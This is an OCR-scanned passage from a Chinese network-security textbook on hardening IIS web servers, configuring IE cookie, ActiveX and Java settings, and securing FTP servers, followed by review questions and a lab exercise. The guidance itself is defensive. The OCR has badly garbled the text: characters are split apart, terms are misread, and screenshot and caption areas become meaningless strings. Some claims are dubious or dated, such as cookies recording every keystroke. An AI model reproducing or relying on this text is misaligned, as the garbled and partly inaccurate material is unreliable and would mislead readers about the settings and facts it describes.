可 以 设置 允许 或 拒绝 从 特定 IP 发 来 的 服务 请 求 ,有 选择 地 允许 特定 主机 的 用 户 访问 服 
务 , 可 以 通过 设置 来 阻止 除 指定 IP 地 址 外 的 整个 网 络 用 户 来 访问 自己 的 Web 服务 器 ,如 
图 6-4 所 示 。 


6-4 全 地 址 访问 限制 
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5) 使 用 SSL 

IIS-Web 的 身份 认证 除了 匿名 访问 、 基 本 验证 和 Windows 请 求 /响应 方式 外 ,还 有 一 种 
安全 性 更 高 的 认证 :通过 SSL 使 用 数字 证 书 进行 访问 。 

SSL 位 于 HTTP 层 和 TCP 层 之 间 , 它 建立 用 户 与 服务 器 之 间 的 加 密 通 信 , 确 保 所 传递 
信息 的 安全 性 。 

SSL 工作 在 公共 密 钥 和 私人 密 钥 基 础 上 ,任何 用 户 都 可 以 获得 公共 密 钥 来 加 密 数 据 ， 
但 解密 数据 必须 要 通过 相应 的 私人 密 钥 。 使 用 SSL 安全 机 制 , 首 先 客户 端 与 服务 器 之 间 建 
立 连接 ,服务 器 把 它 的 数字 证 书 与 公共 密 钥 一 并 发 送 给 客户 端 ,客户 端 随机 生成 会 话 密 钥 ， 
用 从 服务 器 得 到 的 公共 密 钥 对 会 话 密 钥 进行 加 密 ,并 把 会 话 密 钥 在 网 络 上 传递 给 服务 器 ,而 
会 话 密 钥 只 有 在 服务 器 端 用 私人 密 钥 才能 解密 ,这 样 ,客户 端 和 服务 器 端 就 建立 了 一 个 唯一 
的 安全 通道 。 

建立 SSL 安全 机 制 后 ,只 有 SSL 允许 的 客户 才能 与 SSL 允许 的 Web 站 点 进行 通信 ,并 
且 在 使 用 URL 资源 定位 器 时 ,输入 https:// ,而 不 是 http://。SSL 安全 机 制 的 实现 ,将 增 
大 系统 开销 ,增加 服务 器 的 额外 负担 ,从 而 降低 系统 性 能 ,在 规划 时 建议 仅 考虑 为 高 敏感 度 
的 Web 目录 使 用 。 另 外 ,SSL 客户 需要 使 用 IE 6. 0 及 以 上 版 本 才能 使 用 。 

6) 其 他 安全 措施 

如 果 正在 运行 Web 服务 器 ,尽管 已 根据 以 前 所 讨论 过 的 内 容 采取 了 预防 措施 ,也 许 仍 
有 些 安全 漏洞 有 待 于 填补 。 

以 下 列 出 当 提供 Web 服务 时 ,一般 应 当 采 取 的 措施 。 

(1) 停 用 . bat 和 . cmd 文件 的 映像 功能 。 如 果 黑 客 们 拿 到 这 些 Web 服务 器 上 的 可 执行 
文件 ,就 可 能 运行 这 些 Web 文件 。 通 过 取消 对 脚本 程序 的 所 有 目录 的 阅读 许可 权 , 就 可 以 
停 用 某 些 文件 夹 的 映像 功能 。 

(2) 将 脚本 程序 和 数据 存储 在 不 同 目录 ,务必 使 包含 脚本 程序 的 目录 只 拥有 执行 许可 。 

(3) 禁止 使 用 Directory Browsing Allowed( 允 许 目录 浏览 )。 启 动 这 一 功能 后 会 给 出 一 个 
浏览 器 ,该 浏览 器 含有 某 个 目录 中 的 超 文本 文件 列表 ,从 而 使 黑客 能 自 改 目录 中 的 文件 。 

(4) 避免 使 用 Remote Virtual Directories( 远 程 虚拟 目录 )。 务 必 将 IIS 的 所 有 可 执行 
文件 及 数据 安装 在 同一 台 机 器 上 ,并 利用 NTFS 来 保护 。 当 用 户 试图 从 远程 目录 访问 文档 
时 ,总 是 使 用 输入 到 属性 对 话 框 中 的 用 户 名 和 密码 ,这 就 有 可 能 绕 过 访问 控制 列表 。 当 编写 
和 使 用 CGI 脚本 程序 时 ,一 定 要 小 心 。 有 经 验 的 黑客 也 许 会 利用 编写 拙劣 的 CGI 脚本 程序 
来 对 自己 的 系统 进行 访问 。 

(5) 牢记 特权 最 小 的 原则 。 如 果 计 划 只 运行 Web 服务 器 ,那么 只 激活 Web 服务 器 主 
机 的 端口 80。 

(6) 全 面 测试 Web 服务 器 的 安全 性 ,设法 发 现 并 弥补 任何 漏洞 。 


6.2.2 浏览 器 的 安全 性 


在 Internet 中 ,计算 机 网 络 安全 级 别 高 低 的 区 分 是 以 用 户 通过 浏览 器 发 送 数据 和 浏览 
访问 本 地 客户 资源 能 力 高 低 来 区 分 的 。 安 全 和 灵活 是 一 对 矛盾 的 东西 。 高 的 安全 级 别 必 然 
带 来 灵活 性 的 下 降 和 功能 的 限制 。Web 技术 的 发 展 也 是 安全 和 功能 强大 的 平衡 。 纯 粹 文 
字 的 HTML 或 许 是 安全 的 (如 果 把 内 容 给 予 用 户 身 心 带 来 的 冲击 ,比如 暴力 、 色 情 等 不 看 
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做 安全 问题 ) ,但 这 样 功能 会 受到 很 大 限制 。 

安全 是 和 对 象 相关 的 。 一 般 可 以 认为 ,小 组 里 十 分 可 信 的 站 点 ,例如 ,办 公 室 的 软件 服 
务 器 的 数据 和 程序 是 比较 安全 的 ,同时 公司 的 站 点 是 中 等 水 平安 全 的 ,当然 Internet 上 的 大 
多 数 访问 被 认为 是 相当 不 安全 的 ,其 中 黑客 们 的 访问 自然 是 极 不 安全 的 。 

基于 对 访问 对 象 和 访问 方法 的 划分 ,高 版 本 的 IE( 如 IE 5.0) 定 义 了 4 个 通过 浏览 器 访 
li] Internet 的 安全 级 别 : 高 .中 .中 低 、 低 。 并 定义 了 4 类 访问 对 象 :Internet、 本 地 Internet 
( 即 Intranet) ,可 信 站 点 和 受 限 站 点 等 。 也 就 是 说 IE 支持 Cookies Java, ActiveX 等 网 络 新 
技术 ,同时 也 可 以 通过 安全 配置 来 限制 用 户 使 用 ActiveX 控件 .使 用 Cookies、 使 用 脚本 
(Script) ,下载 数 据 和 程序 验证 用 户 登 录 及 对 于 标准 HTML 一 些 可 能 带 来 问题 的 特性 的 
限制 ; 如 Frame( 框 架 网 页 ) 的 使 用 、 提 交 表 单 的 方式 等 。 一般 可 以 从 以 下 几 个 方面 提高 使 
用 浏览 器 的 安全 性 。 


1. Cookie 及 安全 设置 


1) Cookie 

Cookie 是 由 Netscape 开发 并 将 其 作为 持续 保存 状态 信息 和 其 他 信息 的 一 种 方式 ,目前 
绝 大 多 数 浏览 器 都 支持 Cookie 协议 。 如 果 能 够 链 入 网 页 或 其 他 网 络 的 话 ,就 可 以 使 用 
Cookie 来 传递 某 些 具有 特定 功能 的 小 信息 块 。Cookie 是 一 个 存储 于 浏览 器 目录 中 的 文本 
文件 , 约 由 255 个 字符 组 成 , 仅 占 4KB 硬盘 空间 。 当 用 户 正 在 浏览 某 站 点 时 , 它 存储 于 用 户 
机 的 RAM 中 ; 退出 浏览 器 后 , 它 存储 于 用 户 的 硬盘 中 。 存 储 在 Cookie 中 的 大 部 分 信息 是 
普通 的 信息 。 例 如 , 当 浏 览 一 个 站 点 时 ,此 文件 记录 了 每 一 次 的 击 键 信息 和 被 访 站 点 的 
URL 等 。 但 是 许多 Web 站 点 使 用 Cookie 来 储存 针对 私人 的 数据 ,例如 ,注册 密码 ,用户 
名 、 信 用 卡 编号 等 。 若 想 查看 存储 在 Cookie 文件 中 的 信息 ,可 以 从 浏览 器 目录 中 查找 名 为 
Cookie. txt 或 MagicCookie(Mac 机 ) 的 文件 ,然后 利用 文本 编辑 器 和 字 处 理 软件 打开 查看 
即 可 。Cookie 是 以 标准 文本 文件 形式 存储 的 ,因此 不 会 传递 任何 病毒 ,所 以 从 普通 用 户 意 
义 上 讲 ,Cookie 本 身 是 安全 可 靠 的 。 

但 是 , 随 着 互联 网 的 迅速 发 展 ,网 上 服务 功能 的 进一步 开发 和 完善 ,利用 网 络 传递 的 资 
料 信息 愈 来 愈 重 要 ,有 时 涉及 个 人 的 隐私 。 因 此 ,关于 Cookie 的 一 个 值得 关心 的 问题 并 不 
是 Cookie 对 自己 的 机 器 能 做 些 什么 ,而 是 它 能 存储 些 什么 信息 或 传递 什么 信息 到 服务 器 
H, HTTP Cookies 可 以 被 用 来 跟踪 网 上 冲浪 者 访问 过 的 特定 站 点 ,尽管 站 点 的 跟踪 不 用 
Cookies 也 容易 实现 ,不 过 利用 Cookies 使 跟踪 到 的 数据 更 加 坚固 可 靠 。 由 于 一 个 Cookies 
是 Web 服务 器 放置 在 机 器 上 的 ,并 可 以 重新 获取 档案 的 唯一 标识 符 , 因 此 Web 站 点 管理 员 
可 以 利用 Cookies 建立 关于 用 户 及 其 浏览 特征 的 详细 档案 资料 。 用 户 登 录 到 一 个 Web 站 
点 后 ,在 任 一 设置 了 Cookies 的 网 页 上 的 单 击 操作 信息 都 会 被 加 到 该 档案 中 。 档 案 中 的 这 
些 信息 暂时 主要 用 于 对 站 点 的 设计 维护 ,但 除 站 点 管理 员外 并 不 否认 被 别人 窃取 的 可 能 , 假 
如 这 些 Cookie 持 有 者 们 把 一 个 用 户 身 份 链接 到 他 们 的 Cookies ID ,利用 这 些 档案 资料 就 可 
以 确认 用 户 的 名 字 及 地 址 。 此 外 , 某 些 高 级 的 Web 站 点 (如 许多 的 网 上 商业 部 门 ) 实 际 上 采 
用 了 HTTP Cookies 的 注册 鉴定 方式 。 当 用 户 在 站 点 注册 或 请 求 信息 时 ,经 常 输入 确认 他 
们 身份 的 登记 密码 .E-mail 地 址 或 邮政 地 址 到 Web 页 面 的 窗口 中 ,从 Web 页 面 收集 用 户 信 
息 并 提交 给 站 点 服务 器 ,服务 器 利用 Cookies 持久 地 保存 信息 ,并 将 其 放置 在 用 户 机 上 ,等 
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待 以 后 的 访问 。 这 些 Cookies Wik F HTML 信息 中 ,并 在 用 户 机 与 站 点 服务 器 间 来 回 传 
递 , 如 果 用 户 的 注册 信息 未 曾 加密 , 将 是 很 危险 的 。 

2) 拒绝 Cookies 的 方法 

如 果 感 到 不 安全 的 话 ,可 以 拒绝 Web 服务 器 设置 的 Cookie 信息 或 当 服务 器 在 浏览 器 
上 设置 Cookies 时 显示 警告 窗口 , 它 将 告知 设置 的 Cookies 的 值 及 删除 所 花费 的 时 间 。 在 
Windows 下 拒绝 接收 Cookie, 可 以 删除 Cookie 文件 内 容 或 把 文件 属性 设置 为 只 读 和 隐 含 。 
在 浏览 器 下 拒绝 的 具体 方法 如 下 。 

(1) 如 果 想 禁止 个 别 的 Cookies, 例 如 ,记录 双击 键 操作 的 Cookies ,可 以 通过 删除 相应 
文件 内 容 来 破坏 这 些 Cookies ,然后 把 文件 属性 改 为 只 读 、 隐 藏 .系统 属性 ,并 且 存储 文件 。 
当 登 录 到 一 个 设置 了 这 种 Cookies 的 站 点 时 , 它 既 不 能 从 Cookies 读 取 任何 信息 ,也 不 会 传 
递 新 的 信息 。 

(2) 通过 IE 浏览 器 总 体 提供 的 Cookies 的 “安全 ?选项 卡 , 如 图 6-5 所 示 , 单 击 下 方 的 
“ 自 定义 级 别 按 钮 。 

在 弹出 的 “隐私 ?对 话 框 中 , 单 击 “高 级 "按钮 ,出 现 Cookies 设置 选项 ,有 两 个 Cookies 
选项 ,如 图 6-6 所 示 。 


za 安全 。 | 隐私 [as [m [me [sa | 


沈 择 要 查看 的 区 城 职 更 以 安全 设置 。 
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图 6-5 正安 全 选项 卡 图 6-6 Cookies 安全 设置 


。 高 级 隐私 策略 设置 。 指 定 DE 如 何 处 理 来 自 第 一 方 Web 站 点 的 永久 Cookie, 
Cookie 是 由 Internet 站 点 创建 的 文件 ,用 于 在 计算 机 上 存储 有 关 用 户 的 信息 (例如 
身份 和 访问 该 站 点 时 的 首选 项 ) 。 永 久 Cookie 以 文件 的 形式 存储 在 计算 机 上 , 当 TE 
关闭 时 , 它 仍然 保留 在 计算 机 上 。 要 指定 IE 接收 Cookie 而 不 必 先 提示 ,选择 “ 接 
受 ? 单 选 按钮 。 要 指定 Internet Explorer 在 即将 接收 来 自 Web 站 点 的 Cookie 时 发 
出 警告 ,选择 “提示 ” 单 选 按 钮 。 要 指定 不 允许 Web 站 点 将 Cookie 存储 到 计算 机 
上 ,而且 Web 站 点 不 能 读 取 本 机 上 已 有 的 Cookie, 选 择 * 阻 止 ? 单 选 按钮 。 一 般 来 
说 ,为 提高 安全 性 应 选择 "阻止" 单 选 按 钮 。 
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。 高 级 隐私 策略 设置 选项 。 指 定 Internet Explorer 如 何 处 理 来 自 第 三 方 Web 站 点 的 
临时 Cookie, 313583538 Internet Explorer 直接 接收 Cookie 而 不 是 事前 提醒 ,选择 
“接受 " 单 选 按钮 。 如 果 希 望 Internet Explorer 在 即将 接收 来 自 Web 的 Cookie 时 向 
用 户 发 出 警告 ,可 选择 “提示 ” 单 选 按钮 。 如 果 不 允许 来 自 Web 站 点 的 Cookie 进入 
用 户 的 计算 机 ,并 且 不 允许 用 户 计算 机 上 已 有 的 Cookie 被 Web 站 点 读 取 ,可 选择 
“阻止 ? 单 选 按钮 。 

。 通过 注册 表 禁 止 Cookies。 可 删除 注册 表 中 的 如 下 条 目 : 

HKEY LOACL _ MACHINE\SOFTWARE\ Microsoft\ Windows\ CurrentVersion V 

InternetSettings\ Cache\ Special Paths\ Cookies. 然后 重新 启动 机 器 ,并 删除 Windows \ 
Cookies 目录 。 


2. ActiveX 及 安全 设置 


1) ActiveX 

ActiveX 是 Microsoft 公司 提供 的 一 款 高 级 技术 , 它 可 以 像 一 个 应 用 程序 一 样 在 浏览 
器 中 显示 各 种 复杂 的 应 用 。 

ActiveX 是 一 个 技术 集合 ,包括 ActiveX 控件 、ActiveX Xt Pi, ActiveX 服务 器 框架 、 
ActiveX 脚本 .HTML 扩展 等 , 它 使 得 万 维 网 上 交互 内 容 得 以 实现 。 利 用 ActiveX 技术 ,网 
上 应 用 变 得 生动 活泼 ,伴随 着 多 媒体 效果 交互 式 对 象 和 复杂 的 应 用 程序 ,使 用 户 犹如 感受 
CD 质量 的 音乐 一 般 。 它 的 主要 好 处 是 :动态 内 容 可 以 吸引 用 户 , 开 放 的 、 跨 平台 支持 可 以 
运行 在 Macintosh、Windows 和 UNIX 操作 系统 上 。ActiveX 也 是 一 种 开放 开 台 ,可 以 使 开 
发 人 员 为 Internet 和 企业 网 开发 出 程序 。 

因为 ActiveX 的 强大 功能 , 它 可 以 做 很 多 事情 , 它 的 危害 性 也 就 进一步 加 大 了 。 用 户 通 
过 浏览 器 浏览 一 些 带 有 恶意 的 ActiveX 控件 时 ,这 些 控 件 可 以 在 用 户 毫 不 知情 的 情况 下 执 
行 Windows 系统 中 的 任何 程序 ,给 用 户 带 来 很 大 的 安全 风险 。 

2) ActiveX 的 安全 设置 

在 正中 ,也 可 以 对 ActiveX 的 使 用 进行 
限制 。 在 如 图 6-5 所 示 的 “安全 ”选项 卡 中 , 单 
击 “ 自 定义 级 别 ” 按 钮 ,出 现 “ 安 全 设置 ”对话 (d hetiver E BSHT 
框 。 移 动 对 话 框 中 的 垂直 滑 块 ,出 现 *ActiveX Saa 
控件 和 插件 ”设置 选项 ,如 图 6-7 Bros 


O BR 
1 对 标记 为 可 安全 执行 脚本 的 Activer 控件 执行 脚本 * 
OZA 


O gg 
CD 对 标记 为 可 安全 执行 脚本 的 ActiveX ne THEN an 
控件 执行 脚本 。 这 个 设置 是 为 标记 为 安全 执 Oan n 
行 脚 本 的 ActiveX 控件 执行 脚本 设置 执行 的 提示 


策略 。 所 谓 “ 对 标记 为 可 安全 执行 脚本 的 | oni 
ActiveX 控件 执行 脚本 ”选项 ,就 是 指 具备 有 效 | nemen Tle RER 
的 软件 发 行商 证 书 的 软件 。 该 证 书 可 说 明 是 “| xem ex mo 

谁 发 行 了 该 控件 而 且 它 没有 被 算 改 。 知 道 了 
是 谁 发 行 的 控件 ,用 户 就 可 以 决定 是 否 信任 该 
发 行商 。 控 件 包含 的 代码 可 能 会 意外 或 故意 图 6.7 ActiveX 安全 设置 
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损坏 用 户 自 己 的 文件 。 如 果 控 件 未 签名 ,那么 用 户 将 无 法 知道 是 谁 创建 了 它 以 及 能 否 信任 
它 。 指 定 希 望 以 何 种 方式 处 理 具有 潜在 危险 的 操作 文件、 程序 或 下 载 内 容 ,并 选择 下 面 的 
某 项 操作 。 

。 如 果 和 希望 在 继续 之 前 给 出 请 求 批准 的 提示 ,可 选择 “提示 ” 单 选 按 钮 。 

。 如 果 和 希望 不 经 提示 并 自动 拒绝 操作 或 下 载 , 可 选择 “禁用 ” 单 选 按钮 。 

。 如 果 和 希望 不 经 提示 自动 继续 ,可 选择 “启用 ” 单 选 按 钮 。 

(2) 对 没有 标记 为 安全 的 ActiveX 控件 进行 初始 化 和 脚本 化 。 这 个 设置 为 没有 标记 为 
安全 执行 脚本 的 ActiveX 控件 执行 脚本 设置 执行 的 策略 。IE 默认 设置 为 禁用 ,用 户 最 好 不 
要 改变 。 

(3) 下 载 未 签名 的 ActiveX 控件 。 这 个 设置 为 未 签名 的 ActiveX 控件 的 下 载 提 供 策 
略 。 未 签名 的 意思 和 没有 标记 为 安全 执行 脚本 的 解释 是 一 样 的 。IE 默认 设置 为 禁用 ,用 户 
最 好 不 要 改变 。 

(4) 下 载 已 签名 的 ActiveX 控件 。 该 设置 为 已 签名 的 ActiveX 控件 的 下 载 提 供 策 略 。 
默认 设置 为 提示 ,最 好 不 要 自行 改变 。 

(5) 运行 ActiveX 控件 和 插件 。 这 个 设置 是 为 了 运行 ActiveX 控件 和 插件 的 安全 。 这 
是 最 重要 的 设置 ,但 许多 站 点 上 都 使 用 ActiveX 作为 脚本 语言 ,所 以 建议 设置 为 提示 。 这 样 
当 有 ActiveX 运行 时 ,IE 就 会 提醒 用 户 ,用户 可 以 根据 当时 所 处 网 站 ,决定 是 否 使 用 它 提供 
的 ActiveX 控件 。 对 用 户 信 任 的 网 站 ,可 以 放心 地 运行 它 提供 的 控件 。 


3. Java 语言 及 安全 设置 


D Java 语言 特性 

Java 语言 的 特性 使 它 可 以 最 大 限度 地 利用 网 络 。Applet 是 Java 的 小 应 用 程序 , 它 是 
动态 .安全 ,路 平台 的 网 络 应 用 程序 。Java Applet RA HTML, 通 过 主页 发 布 到 Internet, 
当 网 络 用 户 访问 服务 器 的 Applet 时 ,这 些 Applet 在 网 络 上 进行 传输 ,然后 在 支持 Java 的 
浏览 器 中 运行 。 由 于 Java 语言 的 机 制 ,用 户 一 旦 载 入 Applet, 就 可 以 生成 多 媒体 的 用 户 界 
面 或 完成 复杂 的 应 用 。Java 语言 可 以 把 静态 的 超 文本 文件 变 成 可 执行 应 用 程序 , 极 大 地 增 
强 了 超 文本 的 可 交互 操作 性 。 

Java 在 给 人 们 带 来 好 处 的 同时 ,也 带 来 了 潜在 的 安全 隐患 。 由 于 现在 Internet 和 Java 
在 全 球 应 用 得 越 来 越 普及 ,因此 人 们 在 浏览 Web 页 面 的 同时 也 会 同时 下 载 大 量 的 Java 
Applet, 这 就 使 得 Web 用 户 的 计算 机 面临 的 安全 威胁 比 以 往 任何 时 候 都 要 大 。 

在 用 户 浏览 网 页 时 ,这 些 黑客 的 Java 攻击 程序 就 已 经 侵入 到 用 户 的 计算 机 中 去 了 。 所 
以 在 网 络 上 ,不 要 随便 访问 信用 度 不 高 的 站 点 ,以 防止 黑客 的 入侵。 

2) Java 的 安全 设置 

在 正 浏 览 器 中 也 可 以 对 Java 的 使 用 进行 限制 ,具体 实施 步骤 如 下 。 

(1) 打开 IE 浏览 器 ,选择 “工具 ”Internet 选项 ”命令 。 

(2) 在 所 打开 的 对 话 框 中 ,选择 “安全 ”选项 卡 。 

(3) 单 击 选项 卡 上 方 列表 中 Internet 图 标 ( 地 球 标志 ) ,代表 要 设置 整个 IE 的 安全 
设置 。 

(4) 单 击 选项 卡 下 方 的 “ 自 定义 级 别 ” 按 钮 ,打开 “安全 设置 ”对话 框 。 
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(5) 移动 对 话 框 的 垂直 滚动 滑 块 , 直 到 看 到 “Java 权限 ”选项 ,如 图 6-8 Bron 
从 图 6-8 中 可 以 看 到 一 共 包含 5 个 Java 的 安全 设置 ,具体 设置 参考 实 训 相关 内 容 。 
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图 6-8 Java 安全 设置 


6.3 FTP 服务 的 安全 


FTP 服务 由 TCP/IP 的 文件 传输 协议 支持 ,只 要 连 入 Internet 的 两 台 计 算 机 都 支持 
TCP/IP ,运行 FTP 软件 ,用 户 就 可 像 使 用 自己 计算 机 上 的 资源 一 样 , 将 远程 计算 机 上 的 文 
件 复制 到 自己 的 硬盘 。 大 多 数 提供 FTP 服务 的 站 点 允许 用 户 以 Anonymous 作为 用 户 名 登 
录 ( 有 的 站 点 不 需要 输入 账号 名 和 密码 ) ,一 旦 登录 成 功 , 用 户 就 可 以 下 载 文 件 。 如 果 服 务 器 
安全 系统 允许 ,用 户 也 可 以 上 传 文件 ,这 种 FTP 服务 称 为 匿名 服务 。 网 上 有 许多 匿名 FTP 
服务 站 点 ,其 上 有 许多 免费 软件 .图片 和 游戏 ,匿名 FTP 是 人 们 常 使 用 的 一 种 服务 方式 。 匿 
名 FTP 服务 就 像 匿 名 WWW 服务 是 不 需要 密码 的 ,但 用 户 权力 会 受到 严格 的 限制 。 它 允 
许 用 户 访问 FTP 服务 器 上 的 文件 ,这 时 不 正确 的 配置 将 严重 威胁 系统 安全 。 因 此 ,需要 保 
证 使 用 者 不 去 申请 系统 上 其 他 的 区 域 或 文件 ,也 不 能 对 系统 做 任意 的 修改 。 文 件 传输 和 电 
子 邮件 一 样 会 给 网 上 的 站 点 带 来 不 受 欢迎 的 数据 和 程序 。 首 先 文 件 传输 可 能 会 带 来 特洛伊 
木马 ,这 会 给 站 点 以 毁灭 性 的 打击 。 其 次 会 给 站 点 带 人 无 聊 的 游戏 、 盗 版 软件 及 色情 图 画 
等 ,也 会 带 来 时 间 和 磁盘 空间 的 消耗 ,还 可 能 会 造成 拒绝 服务 攻击 。 匿 名 FTP 服务 的 安全 
在 很 大 程度 上 取决 于 一 个 系统 管理 员 的 水 平 。 一 个 低 水 平 的 系统 管理 员 很 可 能 会 错误 配置 
权限 ,从 而 被 黑客 利用 破坏 整个 系统 。 

安装 IIS 组 件 后 ,FTP 服务 器 就 可 运行 。FTP 站 点 并 不 涉及 复杂 的 安全 性 ,没有 太 多 
的 应 用 程序 和 服务 器 /浏览 器 交互 过 程 。 保 证 FTP 服务 器 安全 的 措施 是 通过 FTP 属性 完 
成 的 。 
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6.3.1 目录 安全 设置 


FTP 用 户 仅 有 两 种 目录 权限 : 读 取 和 写 人 ,其 中 读 取 权 限 对 应 于 下 载 , 写 人 权限 对 应 于 
上 传 。FTP 站 点 的 目录 权限 是 对 全 体 访问 该 目录 的 用 户 都 生效 的 权限 , 即 一 旦 某 个 目录 设 
置 为 仅 有 读 取 权限 , 则 任何 FTP 用 户 ,包括 授权 用 户 都 不 能 进行 上 传 操作 。 

目录 权限 可 在 FTP 站 点 和 虚拟 目录 两 个 层次 进行 设置 。 在 IIS 管理 界面 , 右 击 FTP 
站 点 或 虚拟 目录 图 标 ,选择 “属性 ”命令 ,打开 “站 点 属性 ”对 话 框 或 “虚拟 目录 ”属性 对 话 框 ; 
选择 “ 主 目录 ”或 “虚拟 目录 ”选项 卡 , 只 需 选 中 “ 读 取 ”“ 写 人 " 复 选 框 , 即 可 指定 站 点 或 虚拟 
目录 的 目录 访问 权限 ,如 图 6-9 所 示 。 

CD 本 地 路 径 : 当选 择 * 此 计算 机 上 的 目录 ” 单 选 按钮 时 , 单 击 “浏览 ?按钮 选 定 主 目录 
对 应 的 实际 文件 夹 , 下 方 为 目录 权限 。 

(2) 读 取 : 允许 下 载 存储 在 主 目录 的 文件 。 

(3) KA: 可 以 将 文件 上 传 到 站 点 的 主 目录 。 

(4) 记录 访问 : 设置 此 目录 的 访问 记录 存储 在 日 志文 件 。 

(5) 目录 列表 样式 当 打开 站 点 后 ,目录 显示 的 样式 为 操作 系统 的 显示 方式 ,默认 为 
MS-DOS 风格 。 
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图 6-9 “ 主 目录 ”选项 卡 
6.3.2 用 户 验证 控制 


可 设置 是 否 允 许 匿 名 方式 访问 ,在 如 图 6-10 所 示 的 “安全 账户 ”选项 卡 中 ,车 不 选中 “只 
允许 匿名 连接 " 复 选 框 , 则 要 求 只 有 已 注册 的 用 户 提供 正确 的 用 户 名 和 密码 后 才 可 访问 ; 否 
则 ,拒绝 访问 。 若 选中 “只 允许 匿名 连接 ” 复 选 框 , 则 所 有 用 户 均 可 访问 。 
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Hu FTP 站 点 展 性 


me 站 点 | 安全 账户 [消息 [FRF] 


区 许 匿名 连接 @) 
选择 匿名 访问 资源 时 便 用 的 Yindovs 用 户 账 户 。 


用 户 名 四 : [muSR_JIACZ-033792B495 PEG... 


S [ene 


HP 站 点 操作 员 
RUSEHERIERSCT FTP 站 点 的 Windows APP. 
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图 6-10 “安全 账户 ?选项 卡 
6.3.8 ”IP 地 址 限制 访问 


可 以 允许 或 拒绝 指定 IP 地 址 的 主机 的 访问 。 使 用 “目录 安全 性 ”选项 卡 能 够 设置 访问 
限制 ,添加 地 址 授予 访问 或 拒绝 访问 站 点 的 权限 ,如 图 6-11 所 示 。 


图 6-11 “目录 安全 性 ”选项 卡 


在 图 6-11 中 选择 “添加 ”站 点 限制 访问 的 方式 时 ,选择 “授权 访问 "或 “拒绝 访问 " 单 选 按 
钮 , 单 击 “ 添 加 ”按钮 ,打开 “拒绝 以 下 访问 "对话 框 。 在 该 对 话 框 中 选择 限制 的 类 型 为 单机 、 
一 组 计算 机 和 域名 ,然后 输入 拒绝 访问 的 地 址 , 单 击 “确定 ”按钮 即 可 添加 访问 的 限制 条 件 。 


6.3.4 其 他 安全 措施 


当 运 行 FTP 服务 器 时 ,为 保证 安全 应 当 注意 以 下 几 点 : 四 一 定 要 确保 FTP 用 户 无 法 
进入 FTPRoot 目录 以 外 的 目录 ,同时 要 使 用 NTFS 来 保证 服务 器 的 安全 ; 四 避免 使 用 远程 
虚拟 目录 ; 回 当 用 户 从 远程 目录 访问 文档 时 ,属性 页 的 用 户 名 和 密码 ,总 是 要 求 其 提供 输入 
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网 络 安全 技术 


到 属性 页 的 用 户 名 和 密码 ,这 就 有 可 能 绕 过 访问 控制 表 ; @ 一 定 要 启动 日 志 记录 功能 ,在 日 
志和 事件 查看 器 中 查找 没有 成 功 的 登录 信息 ,及 时 发 现 可 疑 信息 ; @ 如 果 只 计划 运行 FTP 
服务 器 ,就 只 开放 端口 20 和 端口 21; @ 全 面 测试 FTP 服务 器 ,并 设法 找到 所 有 的 漏洞 。 
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. Internet 服务 有 哪些 ? 

. Internet 的 安全 隐患 有 哪些 ? 

. IIS 的 安全 设置 有 哪些 ? 

. IIS 服务 器 的 安全 设置 有 哪些 ? 
. Cookie 的 安全 隐患 有 哪些 ? 

.. ActiveX 的 安全 隐患 有 哪些 ? 

. Applet 的 安全 隐患 有 哪些 ? 

.如 何 增强 TE 浏览 器 的 安全 性 ? 
.如 何 增强 FTP 服务 器 的 安全 性 ? 


gi 6.1 Web 服务 安全 


【 实 训 目的 】 
掌握 Web 服务 器 和 浏览 器 的 设置 。 
【 实 训 环境 】 


oo -3 0 ch & 6 r5 c 


装 有 Windows Server 2003 操作 系统 并 开通 Web 服务 。 


【 实 训 内 容 】 


1. 实现 身份 验证 和 访问 控制 


COD 禁止 匿名 访问 。 安 装 TIS 后 产生 匿名 用 户 IUSR_Computername( 密 码 随机 产生 )， 


其 匿名 访问 给 Web 服务 器 带 来 潜在 的 安全 性 问 
题 ,应 对 其 权限 加 以 控制 。 如 无 匿名 访问 需要 ,可 
取消 Web 的 匿名 服务 ,如 图 6-12 所 示 。 

(2) IP 地 址 的 控制 。IIS-Web 可 以 设置 允许 
或 拒绝 从 特定 IP 发 来 的 服务 请 求 ,有 选择 地 允许 
特定 节点 的 用 户 访问 服务 ,可 以 通过 设置 阻止 除 指 
定 IP 地 址 外 的 整个 网 络 用 户 来 访问 Web 服务 器 。 
本 例 中 设置 除 192. 168. 1. 11 网 络 上 的 主机 外 ,其 
他 主机 可 访问 本 Web 服务 器 ,如 图 6-13 所 示 。 

(3) 目录 安全 设置 。 为 确保 网 站 的 安全 性 , 配 
置 Web 服务 器 可 以 看 到 的 目录 以 及 相应 的 访问 层 
次 也 是 很 重要 的 。 第 一 次 安装 IIS 时 ,按照 默认 设 


Lgs w 
GDHESTETRFE/SB. 
匿名 访问 使 用 的 账户 
RPU: 
8p: 


DEEST T 
用 户 访问 直径 过 身份 验证 


M o 
-8 FIFS 


Findon: BUR S S805 388 t B HE D 
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E612 设置 是 否 匿名 访问 


To 要 求 用 记名 和 密码 
| 康 限 制 了 访问 权限 


ER 


[INN 


Ses ”应 用 服务 安全 NU 
置 ,会 自行 创建 一 个 叫 作 InetPub 的 目录 ,接着 为 其 提供 的 Internet 服务 生成 根 目录 。Web 
服务 器 的 根 目录 默认 为 wwwroot, 它 应 当 是 主页 所 在 位 置 (本 例 中 设置 目录 的 访问 权限 为 
只 读 访问 ) ,如 图 6-14 所 示 。 
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图 6-14 “ 主 目录 ”选项 卡 
2. 提高 IE 浏览 器 的 安全 性 


(1) 限制 Cookie 的 使 用 。 

方法 1: 可 以 删除 Cookie 文件 内 容 或 把 文件 属性 设置 为 只 读 和 隐 含 。 具 体操 作 方法 
是 : 如 果 想 禁止 个 别 的 Cookies, 例 如 ,记录 双击 操作 的 Cookies, 可 以 通过 删除 相应 文件 内 容 
来 破坏 这 些 Cookies, 然 后 把 文件 属性 改 为 只 读 、 隐 藏 , 系 统 属性 ,并 且 存储 文件 。 当 登录 到 一 
个 设置 了 这 种 Cookies 的 站 点 时 , 它 既 不 能 从 Cookies 读 取 任何 信息 ,也 不 会 传递 新 的 信息 。 

方法 2: 通过 IE 浏览 器 总 体 提 供 的 Cookies 的 安全 和 隐私 选项 ,具体 步骤 如 下 。 

O 在 浏览 器 中 选择 “工具 ”>“Internet 选项 ”命令 ,打开 “Internet 选项 ”对 话 框 ; 选择 
“安全 ”选项 卡 ,如 图 6-15 所 示 , 单 击 列表 中 的 Internet 图 标 (地 球 标志 ) , 单 击 选项 卡 下 方 的 
“ 自 定义 级 别 ?按钮 。 

